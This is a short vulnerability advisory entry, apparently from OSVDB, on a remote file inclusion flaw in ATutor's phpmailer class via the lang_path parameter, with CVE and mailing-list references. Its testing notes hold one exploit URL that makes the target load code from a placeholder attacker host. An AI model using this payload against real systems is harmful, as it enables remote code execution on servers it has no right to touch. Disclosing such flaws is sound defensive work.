ATutor class.phpmailer.php lang_path Variable Remote File Inclusion

2006-10-19T04:56:33
ID OSVDB:31076
Type osvdb
Reporter OSVDB
Modified 2006-10-19T04:56:33

Description

Manual Testing Notes

http://[target]/ATutor/include/classes/phpmailer/class.phpmailer.php?lang_path=http://[attacker]/command.txt

References:

Related OSVDB ID: 31075 Related OSVDB ID: 31072 Related OSVDB ID: 31073 Related OSVDB ID: 31074 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-10/0333.html CVE-2006-5734